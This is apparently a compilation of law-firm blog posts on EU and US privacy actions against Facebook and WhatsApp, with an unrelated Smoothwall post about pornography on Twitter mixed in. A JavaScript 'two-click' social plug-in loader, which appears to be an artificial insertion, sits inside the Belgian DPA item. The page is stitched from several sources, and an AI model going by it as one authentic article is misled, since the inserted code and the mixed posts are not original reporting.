On December 18, 2017, the French data protection authority (“CNIL”) publicly announced that it served a formal notice to WhatsApp regarding the sharing of WhatsApp users’ data with Facebook Inc. (“Facebook”). This decision, dated November 27, 2017, follows the CNIL’s investigations regarding Facebook’s 2014 acquisition of WhatsApp. In 2016, WhatsApp updated its Terms of Service and Privacy Policy to reflect the sharing of information with Facebook. Following this update, the Article 29 Working Party (“Working Party”) requested explanations from WhatsApp on its data processing practices and data sharing, and asked the company to stop sharing data for targeted advertising purposes. The Working Party also gave a mandate to its subgroup in charge of the cooperation on investigations and sanctions to coordinate actions of the relevant national data protection authorities. It is in that context that the CNIL started its investigation of WhatsApp’s data processing practices.

In its decision, the CNIL found that WhatsApp violated the French Data Protection Act of January 6, 1978, as amended (Loi relative à l’informatique, aux fichiers et aux libertés) by: (1) sharing data with Facebook without an appropriate legal basis, (2) not providing sufficient notice to the relevant data subjects, and (3) not cooperating with the CNIL during the investigation.

Lack of Legal Basis

While WhatsApp shares its users’ data with Facebook for both business intelligence and security purposes, the CNIL focused its analysis on the “business intelligence” purpose. WhatsApp represented that such sharing was based on consent and legitimate interest as legal grounds. In its analysis of both legal bases, the CNIL concluded that:

  • WhatsApp cannot rely on consent to share users’ data with Facebook for “business intelligence” purposes on the grounds that: (1) the consent is not specific enough, and only refers to the messaging service and improving Facebook’s services, and (2) the consent is not freely given, as the only way for a user to object to such processing is to uninstall the application.
  • WhatsApp cannot rely on a legitimate interest to share users’ data with Facebook for “business intelligence” purposes because the company has not implemented sufficient safeguards to preserve users’ interests or fundamental rights. There is no mechanism for the users to refuse the data sharing while continuing to use the application.

Lack of Notice to Data Subjects

The CNIL found that WhatsApp did not provide sufficient notice on the registration form to data subjects about sharing personal data with Facebook.

Lack of Cooperation with the CNIL

The CNIL found that WhatsApp did not provide necessary cooperation during the investigation, such as refusing to provide the CNIL with data pertaining to a sample of French users on the basis that such request conflicts with U.S. law.

The CNIL’s Requests

In its formal notice, the CNIL requires WhatsApp to, within one month:

  • cease sharing users’ data with Facebook for the purpose of “business intelligence” without a legal basis;
  • provide a notice to data subjects that complies with the French Data Protection Act, and informs them of the purposes for which the data is shared with Facebook and their rights as data subjects;
  • provide the CNIL with all the sample personal data requested (i.e., all data shared by WhatsApp with Facebook for a sample of 1,000 French users); and
  • confirm that the company has complied with all of the CNIL’s requests above within the one month deadline.

If WhatsApp fails to comply with the terms of the formal notice within one month, the CNIL may appoint an internal investigator, who may propose that the CNIL imposes sanctions against the company for violations of the French Data Protection Act.

Advocate General Rejects Facebook’s Claim of Sole Irish Jurisdiction in EU

On October 24, 2017, an opinion issued by the EU’s Advocate General Bot (“Bot”) rejected Facebook’s assertion that its EU data processing activities fall solely under the jurisdiction of the Irish Data Protection Commissioner. The non-binding opinion was issued in relation to the CJEU case C-210/16, under which the German courts sought to clarify whether the data protection authority (“DPA”) in the German state of Schleswig-Holstein could take action against Facebook with respect to its use of web tracking technologies on a German education provider’s fan page without first providing notice.

Although Facebook’s EU data processing activities are handled jointly by Facebook, Inc. in the U.S. and Facebook Ireland, its European headquarters, Facebook has a number of subsidiaries in other EU Member States that promote and sell advertising space on the social network. In line with Directive 95/46/EC and the Google Spain decision, Bot held that the processing of personal data via cookies, which Facebook used to improve its targeting of advertisements, had to be considered as being in the context of the activities of the German establishment. It therefore followed that Facebook fell under the jurisdiction of the German DPA and other DPAs in which its subsidiaries engaged in the promotion and sale of advertising space.

The opinion is non-binding and Facebook awaits the CJEU’s verdict. It should be noted, however, that most CJEU verdicts follow the prior opinions of Advocate Generals. Also, this situation may be interpreted differently under the EU’s General Data Protection Regulation (“GDPR”), which replaces existing EU Member State data protection laws based on Directive 95/46/EC when it enters into force on May 25, 2018. Under the GDPR, the One-Stop-Shop mechanism will see the DPA in an organization’s main EU establishment take the role of lead authority. In other EU Member States where the organization has establishments, DPAs will be regarded as ‘concerned authorities,’ but any regulatory action will be driven by the lead authority—which in Facebook’s case likely is the Irish Data Protection Commissioner.

WhatsApp Updates Privacy Policy to Share Information with Facebook

On August 25, 2016, WhatsApp announced in a blog post that the popular mobile messaging platform updated its Terms of Service and Privacy Policy to permit certain information sharing with Facebook. After Facebook acquired WhatsApp in 2014, the Director of the FTC’s Bureau of Consumer Protection wrote a letter to both Facebook and WhatsApp that discussed the companies’ obligations to honor privacy statements made to consumers in connection with the acquisition.

WhatsApp has developed FAQs that discuss the changes to the Terms of Service and Privacy Policy. In addition to describing new product features, such as WhatsApp Calling, the FAQs describe the new information sharing with Facebook. WhatsApp will begin to share users’ phone numbers that are registered with WhatsApp, as well as the last time that individuals used the service. According to the update, WhatsApp will not disclose the content of any messages or photos sent via WhatsApp to Facebook.

The information disclosed to Facebook will be used for several purposes. These include enabling WhatsApp and Facebook to (1) more accurately count users, (2) fight spam and abuse, and (3) improve user experiences across WhatsApp and Facebook services, such as providing better friend suggestions and more relevant ads on Facebook. WhatsApp will provide its users with the ability to opt out from sharing information with Facebook for the purpose of improving Facebook ads and product experiences.

U.S. Government Seeks to Join Schrems Case

On June 13, 2016, the U.S. government expressed its wish to join the legal proceedings brought by Max Schrems concerning the validity of international data transfers under EU Standard Contractual Clauses.

Along with the U.S. government, the Irish Business and Employers Confederation and the Business Software Alliance, an industry trade group, also informed Ireland’s High Court of their desire to be added to the case as amici curiae, or “friends of the court.”

Each party will now have two weeks to file a motion seeking permission to be heard as an amicus curiae. If granted, the party will be allowed to file a written brief, which the High Court can take into account.

UK Deputy Information Commissioner on Safe Harbor: “Don’t Panic”

On October 27, 2015, David Smith, the UK Deputy Commissioner of the Information Commissioner’s Office (“ICO”), published a blog post commenting on the ongoing Safe Harbor compliance debate in light of the Schrems v. Facebook decision of the Court of Justice of the European Union. His key message to organizations was, “Don’t panic.”

After engaging in a brief analysis of the implications of the decision, David Smith asked, “Where does this leave businesses that are using the Safe Harbor?” Smith sums up the ICO’s advice in three key messages:

  • Don’t Panic: The impact of the Schrems decision on other available transfer mechanisms and derogations (e.g. Standard Contractual Clauses, Binding Corporate Rules, consent, etc.) is still being evaluated.
  • Take Stock: Organizations should, as a first step, consider what personal data they are transferring outside of the EU, and what arrangements they have in place to ensure that data is adequately protected. Organizations should also consider the ICO’s guidance on international data transfers, and what alternatives are available in respect of transfers that were previously covered by Safe Harbor. Smith notes the possibility that a new, improved Safe Harbor may be agreed upon, and cautions against significant immediate changes in light of this possibility.
  • Make Up Your Own Mind: Smith highlights the fact that UK data protection law allows organizations to make their own adequacy determination in relation to particular transfers of personal data. Although this possibility is very fact dependent, the ICO confirms that this transfer mechanism remains open to UK-based organizations.

Finally, Smith notes that, although the ICO will consider complaints in relation to data transfers from affected individuals, it will continue to follow its previously published enforcement criteria. The blog post provides reassurance to UK-based organizations that the ICO will not rush to use its enforcement powers, particularly in light of the uncertainty around international transfers of personal data and the future of Safe Harbor. That being said, the ICO stands behind the previous statement issued by the Article 29 Working Party in relation to the Schrems decision, and did not rule out the possibility of enforcement action against organizations that have not taken steps to ensure compliance by January 2016.

Irish Data Protection Authority to Investigate Facebook’s Data Transfers

On October 20, 2015, at a hearing in the Irish High Court, Irish Data Protection Commissioner Helen Dixon confirmed that she will investigate allegations made by privacy activist Max Schrems concerning Facebook’s transfer of personal data to the U.S. in reliance on Safe Harbor. Dixon welcomed the ruling of the High Court and noted that she would proceed to “investigate the substance of the complaint with all due diligence.”

In 2013, Schrems complained to the Irish Data Protection Commissioner (“DPC”) that Facebook’s transfers of personal data to the U.S. were unlawful. The DPC declined to investigate Facebook, on the basis that such an investigation was outside the DPC’s remit. Schrems sought judicial review of that decision and, in the course of hearing Schrems’ complaint, the Irish High Court referred several questions to the Court of Justice of the European Union (“CJEU”). In response to those questions, the CJEU determined that the European Commission’s Safe Harbor Decision is invalid.

In light of the CJEU’s judgment, the DPC’s investigation is expected to conclude that Facebook cannot rely upon the U.S.-EU Safe Harbor Framework as a lawful basis for transferring data to the U.S. The wider consequences for Facebook and other businesses that had until recently relied upon the Safe Harbor, however, remain to be seen. Hunton & Williams has provided further insight into the practical next steps that organizations should consider at this stage.

German DPA Issues Position Paper on Data Transfer Mechanisms in Light of CJEU Safe Harbor Decision

On October 14, 2015, the data protection authority (“DPA”) in the German state of Schleswig-Holstein (Unabhängiges Landeszentrum für Datenschutz) issued a position paper (the “Position Paper”) on the Safe Harbor Decision of the Court of Justice of the European Union (the “CJEU”).

In the Position Paper, the DPA disagrees with the European Commission’s (the “Commission’s”) opinion that alternative data transfer mechanisms may be used in place of Safe Harbor. According to the Position Paper, mechanisms such as consent and EU standard contractual clauses that are currently being discussed should be evaluated in a new way. This evaluation must focus on the principles established by the CJEU, in particular the comparable legal level of protection. The Position Paper indicates that a long-term solution would require a significant change in U.S. law. It is unknown whether other German DPAs will concur with the Position Paper.

It should be noted that the Position Paper is the opinion of only one DPA in Germany, which is known to be conservative. The Position Paper does not invalidate any prior adequacy decisions made by the Commission. As the CJEU held in Schrems v. Facebook, DPAs in the Member States cannot invalidate Commission adequacy decisions.

The Position Paper discusses the recent Schrems v. Facebook decision that invalidated the U.S.-EU Safe Harbor Framework as a data transfer mechanism. The Position Paper notes that there are limited options for the Commission to take with respect to data transfers to the U.S. in the wake of the Schrems decision. These options, however, would require the U.S. to implement comprehensive changes to U.S. law which may be unlikely in the short or medium-term.

With respect to alternative data transfer mechanisms, the Position Paper concludes the following:

  • Consent: The Position Paper notes that individuals must provide effective informed consent. According to the Position Paper, this entails providing individuals with comprehensive information on the lack of personal data protection in the U.S., including (1) the ability and wide-ranging power of the U.S. government to access their data, (2) the lack of data subjects’ rights, and (3) the general failure of the U.S. to adhere to the purpose limitation and necessity principles that are embedded in EU law. Given these issues, especially what it deems groundless mass surveillance conducted by U.S. intelligence agencies, the Position Paper concludes that consent may not be an option to provide a legal basis for data transfers to the U.S.
  • Performance of a Contract: The Position Paper notes that contractual and necessary data transfers between the data subject and the data controller, such as providing data to book travel arrangements, are permissible. The Position Paper, however, indicates that this legal ground would not provide a legal basis for transfers of employee personal data that may be processed in the U.S. for purposes related to employee performance or behavior control.
  • EU Standard Contractual Clauses: With respect to standard contractual clauses as a legal basis for transferring personal data to the U.S., the Position Paper refers to Commission decision 201/87/EU of February 5, 2010 (controller-to-processor data transfers) and Commission decision 2001/497/EC of June 15, 2001 (controller-to-controller transfers). In these decisions, a data importer must agree that it has no reason to believe that any applicable laws will prevent it from fulfilling the instructions and contractual obligations of the data exporter. If that is not the case, then the data exporter has the right to suspend the transfer of data and/or terminate the contract. Therefore, the Position Paper states that data exporters must consider exercising those rights.

Investigations by the DPA

The Position Paper indicates that the Schleswig-Holstein DPA is considering using the power granted to it by Article 4 of Commission decision 201/87/EU of February 5, 2010 to “prohibit or suspend data flows to third countries in order to protect individuals with regard to the processing of their personal data,” if the data importer is not able to comply with EU data protection law, or if the requirements of Article 13 of the EU Data Protection Directive 95/46/EC are not satisfied. The Position Paper further states that data transfers to the U.S. without a legal basis constitute an administrative offense and may be sanctioned with a fine of up to 300,000 EUR.

The Position Paper concludes by noting that the Schleswig-Holstein DPA will assess whether it has to issue administrative orders to prohibit or suspend data transfers and examine whether any offenses have been committed as a result of transferring personal data to the U.S. that does not guarantee an adequate level of data protection.

CJEU Declares the Commission’s U.S. Safe Harbor Decision Invalid

On October 6, 2015, the Court of Justice of the European Union (the “CJEU”) issued its judgment in the Schrems v. Facebook case, following the Opinion of the Advocate General published on September 23, 2015. In its judgment, the CJEU concluded that:

  • The national data protection authorities (“DPAs”) have the power to investigate and suspend international data transfers even where the European Commission (the “Commission”) has adopted a decision finding that a third country affords an adequate level of data protection, such as Decision 2000/520 on the adequacy of the protection provided by the Safe Harbor Privacy Principles (the “Safe Harbor Decision”).
  • The Safe Harbor Decision is invalid.

Powers of National Authorities

The CJEU concluded that a decision of the European Commission on the adequacy level of data protection provided by a non-EU country cannot eliminate or reduce the powers granted to DPAs under the EU Data Protection Directive 95/46/EC. DPAs therefore can suspend international data transfers made under the Safe Harbor Framework following an investigation. The Court, however, also stated that the CJEU alone has the ultimate jurisdiction to examine the validity of a Commission adequacy decision.

Validity of U.S.-EU Safe Harbor Framework

In its judgment, the CJEU also assessed the validity of the Safe Harbor Decision. The CJEU observed that the Safe Harbor Framework solely applies to U.S. undertakings which adhere to it, leaving out of scope U.S. public authorities. In addition, national security, public interest and law enforcement requirements prevail over the Safe Harbor Framework. When a conflict arises with respect to these requirements, the U.S. undertakings are obligated to disregard the existing protective rules. The CJEU further concluded that U.S. legislation does not limit interference with individuals’ rights to what is strictly necessary. Notably, the CJEU indicated that U.S. legislation authorizes, on a general basis, storage of all personal data of all the persons whose data is transferred from the EU to the U.S., without any differentiation, limitation or exception being made in light of the objectives pursued, and without providing an objective criterion for determining limits to the access and use of this data by public authorities.

The CJEU further observed that the Safe Harbor Framework does not provide sufficient legal remedies to allow individuals to access their personal data and to obtain rectification or erasure of such data. This compromises the fundamental right to effective judicial protection, according to the CJEU.

Finally, the CJEU stated that the Safe Harbor Decision restricts the powers of DPAs to investigate the validity of the Decision and the Commission lacked competence to do so. For all of the reasons set forth above, the CJEU declared the Safe Harbor Decision invalid.

Next Steps

Following the judgment of the CJEU, the Irish DPA is required to examine, with all due diligence, whether the transfer of data of Facebook’s European users to the U.S. should be suspended given that the level of protection provided by the U.S. for data transferred under the U.S.-EU Safe Harbor Framework is no longer adequate.

The Article 29 Working Party, the UK Information Commissioner’s Office and the Spanish DPA have already published statements on the CJEU’s judgment explaining that they will work with other EU DPAs to issue further guidance for businesses and clarify the impact of the judgment on businesses.

View the full text of the CJEU’s judgment.

For a summary, please see the press release of the CJEU.

CJEU Announces Date for Judgment on Safe Harbor

On September 29, 2015, the Court of Justice of the European Union (“CJEU”) announced that it will deliver its judgment in the Schrems vs. Facebook case on October 6, 2015. The CJEU’s judgment will be the final ruling in the case, and comes after the Advocate General’s Opinion regarding Safe Harbor earlier this week.

Typically, the CJEU delivers its ruling approximately three to six months after publication of the Advocate General’s opinion. Therefore, the timing of the CJEU’s judgment in this case is unexpected. The exact reasons for the early date are unclear, but the judgment will be very timely in light of the ongoing renegotiations of the U.S.-EU Safe Harbor Framework between the European Commission and the U.S. government.

States Writing Biometric-Capture Laws May Look to Illinois

Recent class actions filed against Facebook and Shutterfly are the first cases to test an Illinois law that requires consent before biometric information may be captured for commercial purposes. Although the cases focus on biometric capture activities primarily in the social-media realm, these cases and the Illinois law at issue have ramifications for any business that employs biometric-capture technology, including those who use it for security or sale-and-marketing purposes. In a recent article published in Law360, Hunton & Williams partner, Torsten M. Kracht, and associate, Rachel E. Mossman, discuss how businesses already using these technologies need to keep abreast of new legislation that might affect the legality of their practices, and how businesses considering the implementation of these technologies should consult local rules and statutes before implementing biometric imaging.

Read the full article now.

Europe’s Highest Court Delays Decision in Safe Harbor Case Schrems vs. Facebook

On June 9, 2015, Max Schrems tweeted that the Advocate General of the European Court of Justice (“ECJ”) will delay his opinion in Europe v. Facebook, a case challenging the U.S.-EU Safe Harbor Framework. The opinion was previously scheduled to be issued on June 24. No new date has been set.

The delay may allow the U.S. and EU to conclude their negotiations regarding updating the Safe Harbor Framework before the ECJ issues an opinion that could impact the Framework. According to reports, although certain issues concerning the national security exemptions to the U.S.-EU Safe Harbor Framework still need to be resolved, the negotiations are expected to be concluded within weeks.

In his case against Facebook, Austrian law student Max Schrems challenges the Irish Data Protection Commissioner’s claim that the Safe Harbor agreement precluded the agency from stopping data transfers from Ireland to the U.S. by Facebook, which participates in the Safe Harbor. Schrems’ case was prompted by the Snowden revelations about U.S. national security authorities accessing personal data of EU citizens transferred to the U.S. via the Safe Harbor Framework. Schrems is seeking the end of the U.S.-EU Safe Harbor Framework.

Belgian Data Protection Authority Issues Recommendation on Facebook’s User Tracking

On May 13, 2015, the Belgian Data Protection Authority (the “DPA”) published a recommendation addressing the use of social plug-ins associated with Facebook and its services (the “Recommendation”). The Recommendation stems from the recent discussions between the DPA and Facebook regarding Facebook’s privacy policy and the tracking of individuals’ Internet activities.

In taking the position that Facebook is subject to Belgian data protection law, the Recommendation focuses on the legitimacy of tracking user activities through Facebook’s social plug-ins. When used to track Internet activities, the DPA asserts that Facebook should obtain a user’s unambiguous and specific consent prior to placing or obtaining cookies through social plug-ins. The DPA further finds that it is excessive to systematically collect information concerning individuals’ visits to websites that contain social plug-ins, even where individuals do not interact with the social plug-ins.

The Recommendation advocates that Facebook be transparent regarding its use of cookies and cease collecting information through cookies and social plug-ins from non-Facebook users or users who have de-activated or logged out of their Facebook account without first obtaining opt-in consent. With respect to active Facebook users, the DPA noted that Facebook should only collect and use information through cookies and social plug-ins when strictly necessary to provide a service explicitly requested by the particular user. In all other cases, opt-in consent from Facebook users is required, according to the DPA.

Furthermore, the Recommendation warns against automatically sharing information with Facebook based on the mere presence of a social plug-in. As a final recommendation to Facebook, the DPA emphasizes that Facebook should modify its user interface to facilitate opt-in consent from its users for the collection and use of information obtained through cookies, in particular, for the use of this information for advertising purposes.

The Recommendation also includes guidance aimed at owners and hosts of websites using social plug-ins from Facebook, as well as Internet users. With regard to website owners and hosts, the DPA points out that they should ensure that social network buttons are only activated after the website users’ consent has been obtained. To comply with this obligation, the DPA recommends the use of instruments, such as “Social Share Privacy,” to help ensure that third party plug-ins only connect to the third party’s servers after the user has clicked on the social plug-in button.
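The two-click pattern the DPA refers to (a local placeholder that fetches nothing from the social network until the user clicks), as an added example that is not Facebook's, Smoothwall's or the Social Share Privacy project's own code; the plug-in URLs and the in-memory consent store are constructed placeholders:

```javascript
// Two-click social plug-in loader in the style recommended by the Belgian DPA:
// the page renders only a locally served placeholder button, and the third
// party's script (and with it its cookies) is requested only after the user
// clicks. An optional "remember my choice" consent lets returning users skip
// the extra click without exposing first-time or logged-out visitors.
// Plug-in URLs below are constructed placeholders, not real endpoints.

const PLUGINS = {
  facebook: { label: 'Like',  src: 'https://social-plugin.example/facebook/sdk.js' },
  twitter:  { label: 'Tweet', src: 'https://social-plugin.example/twitter/widgets.js' },
};

// Consent store kept in memory so the example runs outside a browser; a real
// page would back this with localStorage so the choice survives reloads.
class ConsentStore {
  constructor() { this.granted = new Set(); }
  grant(network)  { this.granted.add(network); }
  revoke(network) { this.granted.delete(network); }
  has(network)    { return this.granted.has(network); }
}

// Default loader for a browser: injects the third party's <script>. The loader
// is injectable so the decision logic can be exercised without a DOM.
function domLoader(src) {
  const s = document.createElement('script');
  s.src = src;
  s.async = true;
  document.head.appendChild(s);
}

// The placeholder is plain HTML referencing no third-party origin at all, so
// rendering it causes no request to (and no cookie from) the social network.
function placeholderHtml(network) {
  const p = PLUGINS[network];
  if (!p) throw new Error(`unknown network: ${network}`);
  return `<button type="button" class="two-click" data-network="${network}">` +
         `${p.label} (click to enable; connects to an external service)</button>`;
}

class TwoClickPlugin {
  constructor(network, consent, loader = domLoader) {
    if (!PLUGINS[network]) throw new Error(`unknown network: ${network}`);
    this.network = network;
    this.consent = consent;
    this.loader = loader;
    this.loaded = false;
  }

  // Called when the placeholder is rendered. Nothing is fetched unless the
  // user previously chose to remember their opt-in for this network.
  mount() {
    if (this.consent.has(this.network)) this.load();
    return this.loaded;
  }

  // First click: the user explicitly activates the plug-in. Only now does the
  // browser contact the third party.
  activate({ remember = false } = {}) {
    if (remember) this.consent.grant(this.network);
    this.load();
    return this.loaded;
  }

  load() {
    if (this.loaded) return;       // idempotent: one script per plug-in
    this.loader(PLUGINS[this.network].src);
    this.loaded = true;
  }
}

// Walk-through with a recording loader: returns the list of URLs that would
// have been requested at each step, so the behaviour can be checked offline.
function demo() {
  const requested = [];
  const store = new ConsentStore();
  const record = (src) => requested.push(src);

  const first = new TwoClickPlugin('facebook', store, record);
  const afterMount = first.mount();                 // false: nothing loaded
  first.activate({ remember: true });               // user clicks, opts to remember

  const second = new TwoClickPlugin('facebook', store, record);
  const remembered = second.mount();                // true: loads immediately

  store.revoke('facebook');
  const third = new TwoClickPlugin('facebook', store, record);
  const afterRevoke = third.mount();                // false again

  return { afterMount, remembered, afterRevoke, requested };
}

if (typeof document === 'undefined') {
  console.log(JSON.stringify(demo()));
}
```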

The DPA has indicated in the media that an enforcement action against Facebook may be necessary if the recommendation is not followed.

Twitter – Den of Iniquity or Paragon of Virtue… or Someplace in Between?

Recently there's been some coverage of Twitter's propensity for porn. Some research has shown that one in every thousand tweets contains something pornographic. With 8662 tweets purportedly sent every second, that's quite a lot.

Now, this is not something that has escaped our notice here at Smoothwall HQ. We like to help our customers keep the web clean and tidy for their users, and mostly that means free of porn. With Twitter that's particularly difficult. Their filtering isn't easy to enforce and, while we have had some reasonable results with a combination of search term filtering and stripping certain tweets based on content, it's still not optimal. Twitter does not enforce content marking and 140 characters is right on the cusp of being impossible to content filter.

That said - how porn-riddled is Twitter? Is there really sex round every corner? Is that little blue bird a pervert? Well, what we've found is: it's all relative.

Twitter is certainly among the more gutter variety of social networks, with Tumblr giving it a decent run for boobs-per-square-inch, but the likes of Facebook are much cleaner — with even images of breastfeeding mothers causing some controversy.

Interestingly, however, our back-of-a-beermat research leads us to believe that about 40 in every 1000 websites is in some way linked to porn — these numbers come from checking a quarter of a million of the most popular sites through Smoothwall's web filter and seeing what gets tagged as porn. Meanwhile, the Huffington Post reports that 30% of all Internet traffic is porn - the biggest number thus far. However, given the tendency of porn toward video, I guess we shouldn't be shocked.

Twitter: hard to filter, relatively porn-rich social network which is only doing its best to mirror the makeup of the Internet at large. As a school network admin, I would have it blocked for sure: Twitter themselves used to suggest a minimum age of 13, though this requirement quietly went away in a recent update to their terms of service.

German DPA Appeals Court Decision on Facebook Fan Pages and Suggests Clarification by ECJ on Data Controllership

On January 14, 2015, the data protection authority of the German federal state of Schleswig-Holstein (“Schleswig DPA”) issued an appeal challenging a September 4, 2014 decision by the Administrative Court of Appeals, which held that companies using Facebook’s fan pages cannot be held responsible for data protection law violations committed by Facebook because the companies do not have any control over the use of the data.

The Schleswig DPA claimed that because companies create the fan pages, they are responsible for the data collected and processed by Facebook through the fan pages for purposes such as behavioral advertising. The Schleswig DPA also alleged that the court failed to (1) examine Facebook’s business model, (2) assess technical details related to the functioning of fan pages, and (3) consider the social use of fan pages. The Schleswig DPA argued that the Court of Appeals is in an appropriate position to rule and review decisions of lower courts only after it addresses the three issues above. In addition, the Schleswig DPA stated that Facebook’s business model violates a number of provisions in the German Telemedia Act, including the sections related to user profiling. The Schleswig DPA also suggested that if the court does not concur with the Schleswig DPA’s interpretation of EU data protection law regarding data controllership on social networking websites, the case should be referred to the European Court of Justice (“ECJ”) for a preliminary ruling. An ECJ preliminary ruling is a decision regarding the interpretation of European Union law at the request of an EU member state court.

SEC Issues New Guidance on the Use of Social Media

On April 21, 2014, the Securities and Exchange Commission’s Division of Corporation Finance published new Compliance and Disclosure Interpretations (“C&DIs”) concerning the use of social media in certain securities offerings, business combinations and proxy contests. Notably, the C&DIs permit the use of an active hyperlink to satisfy the cautionary legend requirements in social media communications when the social media platform limits the text or number of characters that may be included (e.g., Twitter). The C&DIs also clarify that postings or messages re-transmitted by unrelated third parties generally will not be attributable to the issuer (so issuers will not be required to ensure that third parties comply with the guidance). In addition, requirements regarding cautionary legends contemplated by the C&DIs apply to both issuers and other soliciting parties in proxy fights or tender offers. Accordingly, although the new guidance will allow issuers to communicate with their shareholders and potential investors via social media, it also may prove useful to activists in proxy fights and tender offers.

Read the full client alert on the SEC’s new C&DIs.

FTC Notifies Facebook, WhatsApp of Privacy Obligations in Light of Proposed Acquisition

On April 10, 2014, the Federal Trade Commission announced that the Director of the FTC’s Bureau of Consumer Protection had notified Facebook and WhatsApp Inc., reminding both companies of their obligation to honor privacy statements made to consumers in connection with Facebook’s proposed acquisition of WhatsApp.

In a letter to the companies, Bureau Director Jessica Rich wrote, “WhatsApp has made a number of promises about the limited nature of the data it collects, maintains, and shares with third parties – promises that exceed the protections currently promised to Facebook users. We want to make clear that, regardless of the acquisition, WhatsApp must continue to honor these promises to consumers.”

The letter further noted that the companies could be in violation of Section 5 of the FTC Act if WhatsApp fails to honor its promises after the acquisition is completed, and that Facebook also may be in violation of the FTC’s 2012 order against Facebook, which settled allegations from the FTC that Facebook deceived consumers by making false privacy promises.

Read the related post on the FTC’s Business Center Blog.

German Appeals Court Finds German Data Protection Law Applicable to Facebook

On January 24, 2014, the Chamber Court of Berlin rejected Facebook’s appeal of an earlier judgment by the Regional Court of Berlin in cases brought by a German consumer rights organization. In particular, the court: 

  • enjoined Facebook from, broadly, operating its “Find a Friend” functionality in a way that violates the German Unfair Competition Act;
  • enjoined Facebook from using certain provisions in (1) its terms and conditions, and (2) privacy notices concerning advertisements, licensing, personal data relating to third parties and personal data collected through other websites; and
  • mandated that Facebook provide users with more information about how their address data will be used by the “Find a Friend” functionality.

Similar to its earlier case against Apple, the German consumer rights organization successfully argued that German, not Irish, data protection law applied. Although other German courts have not always accepted this line of reasoning, the court followed it here and, notably, also held that a breach of data protection law may constitute a breach of the Unfair Competition Act. This approach represents a new development in the data protection context. One of the conditions for consumer rights organizations to be able to commence legal proceedings is that there is a violation of the Unfair Competition Act. Recognizing data protection law violations as violations of the Unfair Competition Act therefore arguably makes it easier for consumer rights organizations to bring privacy-oriented cases. It also can be seen as part of a wider trend to improve the ability of German consumer rights organizations to sue for breaches of data protection law.

The Chamber Court’s ruling is not yet binding and is subject to appeal.